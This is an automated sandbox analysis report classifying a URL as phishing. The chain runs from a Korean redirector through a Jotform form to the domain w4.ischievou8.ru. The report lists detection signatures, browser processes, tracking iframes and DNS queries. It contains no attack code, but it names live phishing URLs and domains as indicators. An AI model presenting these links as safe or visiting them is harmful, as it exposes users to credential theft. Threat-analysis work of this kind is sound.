Edit tour

Windows Analysis Report
https://access.kinu.or.kr:8443/link.n2s?url=https://form.jotform.com/242704649007052

Overview

General Information

Sample URL:https://access.kinu.or.kr:8443/link.n2s?url=https://form.jotform.com/242704649007052
Analysis ID:1530334
Infos:

Detection

Phisher
Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Phisher
Phishing site detected (based on shot match)
HTML page contains hidden javascript code
Invalid T&C link found
Stores files to the Windows start menu directory
Suspicious form URL found

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64_ra
  • chrome.exe (PID: 6956 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6160 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1900,i,13689021469146400916,11221088396507404488,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 8168 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5936 --field-trial-handle=1900,i,13689021469146400916,11221088396507404488,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7144 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3116 --field-trial-handle=1900,i,13689021469146400916,11221088396507404488,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 3564 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://access.kinu.or.kr:8443/link.n2s?url=https://form.jotform.com/242704649007052" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
SourceRuleDescriptionAuthorStrings
dropped/chromecache_239JoeSecurity_Phisher_2Yara detected PhisherJoe Security
    No Sigma rule has matched
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    Phishing

    barindex
    Source: Yara matchFile source: dropped/chromecache_239, type: DROPPED
    Source: https://form.jotform.com/242704649007052Matcher: Template: captcha matched
    Source: https://form.jotform.com/242704649007052Matcher: Template: captcha matched
    Source: https://form.jotform.com/242704649007052Matcher: Template: captcha matched
    Source: https://form.jotform.com/242704649007052Matcher: Template: captcha matched
    Source: https://form.jotform.com/242704649007052Matcher: Template: captcha matched
    Source: https://form.jotform.com/242704649007052HTTP Parser: Base64 decoded: {"typ":"JWT","alg":"HS256"}
    Source: https://www.etsy.com/HTTP Parser: Invalid link: Privacy settings
    Source: https://www.etsy.com/HTTP Parser: Invalid link: Privacy settings
    Source: https://www.etsy.com/HTTP Parser: Invalid link: Privacy settings
    Source: https://www.etsy.com/HTTP Parser: Form action: /search.php
    Source: https://www.etsy.com/HTTP Parser: Form action: /search.php
    Source: https://www.etsy.com/HTTP Parser: Form action: /search.php
    Source: https://www.etsy.com/HTTP Parser: Iframe src: //www.googletagmanager.com/ns.html?id=GTM-KWW5SS
    Source: https://www.etsy.com/HTTP Parser: Iframe src: https://8666735.fls.doubleclick.net/activityi;src=8666735;type=count0;cat=etsy_00;ord=1;num=8756467898722;npa=0;auiddc=2111120285.1728513237;u2=RLMmaTf_kJrAe-ogNvmqp7rV2rK_;ps=1;pcor=646584803;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe4a70v9189895925z86935543za201zb6935543;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=101529666~101671035~101686685~101747727;epver=2;~oref=https%3A%2F%2Fwww.etsy.com%2F?
    Source: https://www.etsy.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/fls/rul/activityi;fledge=1;src=8666735;type=count0;cat=etsy_00;ord=1;num=8756467898722;npa=0;auiddc=2111120285.1728513237;u2=RLMmaTf_kJrAe-ogNvmqp7rV2rK_;ps=1;pcor=646584803;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe4a70v9189895925z86935543za201zb6935543;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=101529666~101671035~101686685~101747727;epver=2;~oref=https%3A%2F%2Fwww.etsy.com%2F?
    Source: https://www.etsy.com/HTTP Parser: Iframe src: https://8666735.fls.doubleclick.net/activityi;src=8666735;type=count0;cat=etsy_000;ord=1;num=3043274380888;npa=0;auiddc=2111120285.1728513237;ps=1;pcor=742816089;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe4a70v9189895925z86935543za201zb6935543;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=101529666~101671035~101686685~101747727;epver=2;~oref=https%3A%2F%2Fwww.etsy.com%2F?
    Source: https://www.etsy.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/fls/rul/activityi;fledge=1;src=8666735;type=count0;cat=etsy_000;ord=1;num=3043274380888;npa=0;auiddc=2111120285.1728513237;ps=1;pcor=742816089;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe4a70v9189895925z86935543za201zb6935543;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=101529666~101671035~101686685~101747727;epver=2;~oref=https%3A%2F%2Fwww.etsy.com%2F?
    Source: https://www.etsy.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/658194373?random=1728513239082&cv=11&fst=1728513239082&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4a70v870186735z86935543za201zb6935543&gcs=G111&gcd=13t3t3t3t5l1&dma=0&tag_exp=101671035~101686685~101747727&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.etsy.com%2F&ref=https%3A%2F%2Fw4.ischievou8.ru%2F&label=XwNfCLSf5dkDEMX_7LkC&hn=www.googleadservices.com&frm=0&tiba=Etsy%20-%20Shop%20for%20handmade%2C%20vintage%2C%20custom%2C%20and%20unique%20gifts%20for%20everyone&value=0&bttype=purchase&npa=0&pscdl=noapi&auid=2111120285.1728513237&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&capi=1&data=ads_data_redaction%3Dfalse&ct_cookie_present=0
    Source: https://www.etsy.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/ga/rul?tid=G-KR3J610VYM&gacid=759860771.1728513240&gtm=45je4a70v868381678z86935543za200zb6935543&dma=0&gcs=G111&gcd=13t3t3t3t5l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101671035~101686685~101747727&z=1886270896
    Source: https://www.etsy.com/HTTP Parser: Iframe src: //www.googletagmanager.com/ns.html?id=GTM-KWW5SS
    Source: https://www.etsy.com/HTTP Parser: Iframe src: https://8666735.fls.doubleclick.net/activityi;src=8666735;type=count0;cat=etsy_00;ord=1;num=8756467898722;npa=0;auiddc=2111120285.1728513237;u2=RLMmaTf_kJrAe-ogNvmqp7rV2rK_;ps=1;pcor=646584803;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe4a70v9189895925z86935543za201zb6935543;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=101529666~101671035~101686685~101747727;epver=2;~oref=https%3A%2F%2Fwww.etsy.com%2F?
    Source: https://www.etsy.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/fls/rul/activityi;fledge=1;src=8666735;type=count0;cat=etsy_00;ord=1;num=8756467898722;npa=0;auiddc=2111120285.1728513237;u2=RLMmaTf_kJrAe-ogNvmqp7rV2rK_;ps=1;pcor=646584803;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe4a70v9189895925z86935543za201zb6935543;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=101529666~101671035~101686685~101747727;epver=2;~oref=https%3A%2F%2Fwww.etsy.com%2F?
    Source: https://www.etsy.com/HTTP Parser: Iframe src: https://8666735.fls.doubleclick.net/activityi;src=8666735;type=count0;cat=etsy_000;ord=1;num=3043274380888;npa=0;auiddc=2111120285.1728513237;ps=1;pcor=742816089;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe4a70v9189895925z86935543za201zb6935543;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=101529666~101671035~101686685~101747727;epver=2;~oref=https%3A%2F%2Fwww.etsy.com%2F?
    Source: https://www.etsy.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/fls/rul/activityi;fledge=1;src=8666735;type=count0;cat=etsy_000;ord=1;num=3043274380888;npa=0;auiddc=2111120285.1728513237;ps=1;pcor=742816089;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe4a70v9189895925z86935543za201zb6935543;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=101529666~101671035~101686685~101747727;epver=2;~oref=https%3A%2F%2Fwww.etsy.com%2F?
    Source: https://www.etsy.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/658194373?random=1728513239082&cv=11&fst=1728513239082&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4a70v870186735z86935543za201zb6935543&gcs=G111&gcd=13t3t3t3t5l1&dma=0&tag_exp=101671035~101686685~101747727&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.etsy.com%2F&ref=https%3A%2F%2Fw4.ischievou8.ru%2F&label=XwNfCLSf5dkDEMX_7LkC&hn=www.googleadservices.com&frm=0&tiba=Etsy%20-%20Shop%20for%20handmade%2C%20vintage%2C%20custom%2C%20and%20unique%20gifts%20for%20everyone&value=0&bttype=purchase&npa=0&pscdl=noapi&auid=2111120285.1728513237&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&capi=1&data=ads_data_redaction%3Dfalse&ct_cookie_present=0
    Source: https://www.etsy.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/ga/rul?tid=G-KR3J610VYM&gacid=759860771.1728513240&gtm=45je4a70v868381678z86935543za200zb6935543&dma=0&gcs=G111&gcd=13t3t3t3t5l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101671035~101686685~101747727&z=1886270896
    Source: https://www.etsy.com/HTTP Parser: Iframe src: https://9910951.fls.doubleclick.net/activityi;src=9910951;type=remarkt;cat=unive0;ord=9677501052098;npa=0;auiddc=2111120285.1728513237;u2=%2F;u3=undefined;ps=1;pcor=1074523630;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe4a70v9190758491z86935543za201zb6935543;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=101671035~101686685~101747727;epver=2;~oref=https%3A%2F%2Fwww.etsy.com%2F?
    Source: https://www.etsy.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/fls/rul/activityi;fledge=1;src=9910951;type=remarkt;cat=unive0;ord=9677501052098;npa=0;auiddc=2111120285.1728513237;u2=%2F;u3=undefined;ps=1;pcor=1074523630;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe4a70v9190758491z86935543za201zb6935543;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=101671035~101686685~101747727;epver=2;~oref=https%3A%2F%2Fwww.etsy.com%2F?
    Source: https://www.etsy.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/995917074?random=1728513240015&cv=11&fst=1728513240015&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4a70v883287104z86935543za201zb6935543&gcd=13t3t3t3t5l1&dma=0&tag_exp=101529666~101671035~101686685~101747727&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.etsy.com%2F&ref=https%3A%2F%2Fw4.ischievou8.ru%2F&hn=www.googleadservices.com&frm=0&tiba=Etsy%20-%20Shop%20for%20handmade%2C%20vintage%2C%20custom%2C%20and%20unique%20gifts%20for%20everyone&npa=0&pscdl=noapi&auid=2111120285.1728513237&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ecomm_prodid%3D%3Becomm_pagetype%3Dhome%3Becomm_totalvalue%3D%3Becomm_rec_prodid%3D%3Becomm_category%3D%3Becomm_pvalue%3D%3Becomm_quantity%3D%3Ba%3D%3Bg%3D%3Bhasaccount%3Dfalse%3Bcqs%3D%3Brp%3D%3Bly%3D%3Bhs%3D%3B_google_crm_id%3D%3Bads_data_redaction%3Dfalse
    Source: https://www.etsy.com/HTTP Parser: Iframe src: https://ct.pinterest.com/ct.html
    Source: https://www.etsy.com/HTTP Parser: Iframe src: https://d.agkn.com/iframe/10898/?che=1728513234&gauid=759860771.1728513240
    Source: https://www.etsy.com/HTTP Parser: Iframe src: //www.googletagmanager.com/ns.html?id=GTM-KWW5SS
    Source: https://www.etsy.com/HTTP Parser: Iframe src: https://8666735.fls.doubleclick.net/activityi;src=8666735;type=count0;cat=etsy_00;ord=1;num=8756467898722;npa=0;auiddc=2111120285.1728513237;u2=RLMmaTf_kJrAe-ogNvmqp7rV2rK_;ps=1;pcor=646584803;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe4a70v9189895925z86935543za201zb6935543;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=101529666~101671035~101686685~101747727;epver=2;~oref=https%3A%2F%2Fwww.etsy.com%2F?
    Source: https://www.etsy.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/fls/rul/activityi;fledge=1;src=8666735;type=count0;cat=etsy_00;ord=1;num=8756467898722;npa=0;auiddc=2111120285.1728513237;u2=RLMmaTf_kJrAe-ogNvmqp7rV2rK_;ps=1;pcor=646584803;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe4a70v9189895925z86935543za201zb6935543;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=101529666~101671035~101686685~101747727;epver=2;~oref=https%3A%2F%2Fwww.etsy.com%2F?
    Source: https://www.etsy.com/HTTP Parser: Iframe src: https://8666735.fls.doubleclick.net/activityi;src=8666735;type=count0;cat=etsy_000;ord=1;num=3043274380888;npa=0;auiddc=2111120285.1728513237;ps=1;pcor=742816089;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe4a70v9189895925z86935543za201zb6935543;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=101529666~101671035~101686685~101747727;epver=2;~oref=https%3A%2F%2Fwww.etsy.com%2F?
    Source: https://www.etsy.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/fls/rul/activityi;fledge=1;src=8666735;type=count0;cat=etsy_000;ord=1;num=3043274380888;npa=0;auiddc=2111120285.1728513237;ps=1;pcor=742816089;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe4a70v9189895925z86935543za201zb6935543;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=101529666~101671035~101686685~101747727;epver=2;~oref=https%3A%2F%2Fwww.etsy.com%2F?
    Source: https://www.etsy.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/658194373?random=1728513239082&cv=11&fst=1728513239082&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4a70v870186735z86935543za201zb6935543&gcs=G111&gcd=13t3t3t3t5l1&dma=0&tag_exp=101671035~101686685~101747727&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.etsy.com%2F&ref=https%3A%2F%2Fw4.ischievou8.ru%2F&label=XwNfCLSf5dkDEMX_7LkC&hn=www.googleadservices.com&frm=0&tiba=Etsy%20-%20Shop%20for%20handmade%2C%20vintage%2C%20custom%2C%20and%20unique%20gifts%20for%20everyone&value=0&bttype=purchase&npa=0&pscdl=noapi&auid=2111120285.1728513237&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&capi=1&data=ads_data_redaction%3Dfalse&ct_cookie_present=0
    Source: https://www.etsy.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/ga/rul?tid=G-KR3J610VYM&gacid=759860771.1728513240&gtm=45je4a70v868381678z86935543za200zb6935543&dma=0&gcs=G111&gcd=13t3t3t3t5l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101671035~101686685~101747727&z=1886270896
    Source: https://www.etsy.com/HTTP Parser: Iframe src: https://9910951.fls.doubleclick.net/activityi;src=9910951;type=remarkt;cat=unive0;ord=9677501052098;npa=0;auiddc=2111120285.1728513237;u2=%2F;u3=undefined;ps=1;pcor=1074523630;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe4a70v9190758491z86935543za201zb6935543;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=101671035~101686685~101747727;epver=2;~oref=https%3A%2F%2Fwww.etsy.com%2F?
    Source: https://www.etsy.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/fls/rul/activityi;fledge=1;src=9910951;type=remarkt;cat=unive0;ord=9677501052098;npa=0;auiddc=2111120285.1728513237;u2=%2F;u3=undefined;ps=1;pcor=1074523630;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe4a70v9190758491z86935543za201zb6935543;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=101671035~101686685~101747727;epver=2;~oref=https%3A%2F%2Fwww.etsy.com%2F?
    Source: https://www.etsy.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/995917074?random=1728513240015&cv=11&fst=1728513240015&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4a70v883287104z86935543za201zb6935543&gcd=13t3t3t3t5l1&dma=0&tag_exp=101529666~101671035~101686685~101747727&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.etsy.com%2F&ref=https%3A%2F%2Fw4.ischievou8.ru%2F&hn=www.googleadservices.com&frm=0&tiba=Etsy%20-%20Shop%20for%20handmade%2C%20vintage%2C%20custom%2C%20and%20unique%20gifts%20for%20everyone&npa=0&pscdl=noapi&auid=2111120285.1728513237&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ecomm_prodid%3D%3Becomm_pagetype%3Dhome%3Becomm_totalvalue%3D%3Becomm_rec_prodid%3D%3Becomm_category%3D%3Becomm_pvalue%3D%3Becomm_quantity%3D%3Ba%3D%3Bg%3D%3Bhasaccount%3Dfalse%3Bcqs%3D%3Brp%3D%3Bly%3D%3Bhs%3D%3B_google_crm_id%3D%3Bads_data_redaction%3Dfalse
    Source: https://www.etsy.com/HTTP Parser: Iframe src: https://d.agkn.com/iframe/10898/?che=1728513234&gauid=759860771.1728513240
    Source: https://form.jotform.com/242704649007052HTTP Parser: No favicon
    Source: https://form.jotform.com/242704649007052HTTP Parser: No favicon
    Source: https://form.jotform.com/242704649007052HTTP Parser: No favicon
    Source: https://form.jotform.com/242704649007052HTTP Parser: No favicon
    Source: https://form.jotform.com/242704649007052HTTP Parser: No favicon
    Source: https://form.jotform.com/242704649007052HTTP Parser: No favicon
    Source: https://form.jotform.com/242704649007052HTTP Parser: No favicon
    Source: https://form.jotform.com/242704649007052HTTP Parser: No favicon
    Source: https://form.jotform.com/242704649007052HTTP Parser: No favicon
    Source: https://w4.ischievou8.ru/dr2/HTTP Parser: No favicon
    Source: https://w4.ischievou8.ru/dr2/HTTP Parser: No favicon
    Source: https://www.etsy.com/HTTP Parser: No favicon
    Source: https://www.etsy.com/HTTP Parser: No favicon
    Source: https://www.etsy.com/HTTP Parser: No favicon
    Source: https://www.etsy.com/HTTP Parser: No favicon
    Source: https://www.etsy.com/HTTP Parser: No favicon
    Source: https://www.etsy.com/HTTP Parser: No favicon
    Source: https://www.etsy.com/HTTP Parser: No favicon
    Source: https://www.etsy.com/HTTP Parser: No favicon
    Source: https://www.etsy.com/HTTP Parser: No favicon
    Source: https://www.etsy.com/HTTP Parser: No <meta name="author".. found
    Source: https://www.etsy.com/HTTP Parser: No <meta name="author".. found
    Source: https://www.etsy.com/HTTP Parser: No <meta name="author".. found
    Source: https://www.etsy.com/HTTP Parser: No <meta name="copyright".. found
    Source: https://www.etsy.com/HTTP Parser: No <meta name="copyright".. found
    Source: https://www.etsy.com/HTTP Parser: No <meta name="copyright".. found
    Source: unknownHTTPS traffic detected: 2.16.185.191:443 -> 192.168.2.16:49708 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49715 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49761 version: TLS 1.2
    Source: chrome.exeMemory has grown: Private usage: 20MB later: 27MB
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 2.16.185.191
    Source: unknownTCP traffic detected without corresponding DNS query: 2.16.185.191
    Source: unknownTCP traffic detected without corresponding DNS query: 2.16.185.191
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 2.16.185.191
    Source: unknownTCP traffic detected without corresponding DNS query: 2.16.185.191
    Source: unknownTCP traffic detected without corresponding DNS query: 2.16.185.191
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficDNS traffic detected: DNS query: access.kinu.or.kr
    Source: global trafficDNS traffic detected: DNS query: _8443._https.access.kinu.or.kr
    Source: global trafficDNS traffic detected: DNS query: form.jotform.com
    Source: global trafficDNS traffic detected: DNS query: cdn01.jotfor.ms
    Source: global trafficDNS traffic detected: DNS query: cdn02.jotfor.ms
    Source: global trafficDNS traffic detected: DNS query: cdn03.jotfor.ms
    Source: global trafficDNS traffic detected: DNS query: hcaptcha.com
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: events.jotform.com
    Source: global trafficDNS traffic detected: DNS query: newassets.hcaptcha.com
    Source: global trafficDNS traffic detected: DNS query: api2.hcaptcha.com
    Source: global trafficDNS traffic detected: DNS query: cdn.jotfor.ms
    Source: global trafficDNS traffic detected: DNS query: api.hcaptcha.com
    Source: global trafficDNS traffic detected: DNS query: imgs.hcaptcha.com
    Source: global trafficDNS traffic detected: DNS query: imgs3.hcaptcha.com
    Source: global trafficDNS traffic detected: DNS query: api.jotform.com
    Source: global trafficDNS traffic detected: DNS query: submit.jotform.com
    Source: global trafficDNS traffic detected: DNS query: surzofilmography.com
    Source: global trafficDNS traffic detected: DNS query: w4.ischievou8.ru
    Source: global trafficDNS traffic detected: DNS query: code.jquery.com
    Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
